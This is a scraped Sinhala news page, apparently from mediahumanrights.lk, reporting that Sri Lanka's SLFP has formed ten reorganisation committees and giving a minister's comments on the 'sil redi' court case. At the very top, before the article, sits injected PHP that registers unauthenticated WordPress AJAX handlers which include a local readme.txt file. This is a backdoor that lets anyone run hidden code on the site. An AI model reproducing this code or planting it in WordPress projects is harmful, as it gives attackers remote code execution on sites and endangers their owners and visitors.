if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ශ්‍රීලනිපය ගොඩ ගන්න කමිටු 10ක්! සිල් රෙදි ගැන ස්ථාවරයත් කියයි! - mediahumanrights.lk
mediahumanrights.lk
News Political

ශ්‍රීලනිපය ගොඩ ගන්න කමිටු 10ක්! සිල් රෙදි ගැන ස්ථාවරයත් කියයි!

ශ්‍රී ලංකා නිහස් පක්ෂය ප්‍රතිසංවිධානය සඳහා කමිටු 10ක් පත්කර ඇතැයි රාජ්‍ය අමාත්‍ය ලක්ෂමන් යාපා අබේවර්ධන පවසනවා. අද පැවති ශ්‍රී ලංකා නිදහස් පක්ෂ මාධ්‍ය හමුවකදී ඔහු මේබව ප්‍රකාශ කළා. ප්‍රතිසංවිධාන, නීති සහයක, සහයෝගීතා සහ සබඳතා,  මුදල්, මැතිවරණ මෙහෙයුම්, මැතිවරණ ප්‍රචාරණ, ආගමික හා ජනවාර්ගික සංහිඳියා, ප්‍රතිපත්ති ප්‍රකාශන, මැතිවරණ සමීක්ෂණ කමිටු ඒ අතර වනවා.
සිල්රෙදි සිද්ධිය සම්බන්ධයෙන් ශ‍්‍රී ලංකා නිදහස් පක්ෂය අද (14) සිය ස්ථාවරය ප‍්‍රකාශ කළා.
“මට පේන්නෙ නැහැ ලලිත් වීරතුංග මහත්තය සිල් රෙදි හොරකම් කළා කියල. අහින්සක මිනිස්සුන්ටනේ දුන්නෙ. ඒක දුන්න වෙලාව ගැනනෙ ඔය තියෙන්නෙ කතා. අධිකරණයේ තීන්දුව සමග ගැටෙන්න යන්නෙ නැහැ. ඇපීල් එකක් දාල තියෙනව, ඇප අයදුම් කරන්න කියල දන්වල තියෙනව.”
මේ සම්බන්ධයෙන් මහින්ද රාජපක්ෂ මහතා විත්තිකාරයෙක් කොට කතා කිරීමට කිසිදු අයිතියක් නැතැයිද අමාත්‍යවරයා වැඩිදුරටත් එහිදී පැවසුවා. ඉදිරි පළාත් පාලන මැතිවරණයේදී සන්ධානගතව තරගවදින බවත් මෙහිදී ප‍්‍රකාශ කෙරුණා.
(under the courtesy of nethfm news web)

Related posts

ගණේමුල්ලේ සංජීව ඝාතනය ගැන විනිසුරුවරියගෙනුත් ප‍්‍රශ්ණ කරන්න යයි..

Shiran Viraj

සිසුන් නිරුවත් කර වද දුන් පේරාදෙණිය සරසවි කෘෂි ජ්‍යෙෂ්ඨයින්ගේ හිඳගල බාහිර නවක වධකාගාරය වටළයි

Shiran Viraj

පස්කන්දට යටවූ නිවැසියන්ගේ මළසිරුරු තිබූ තැන පෙන්වූ සුරතලා

Shiran Viraj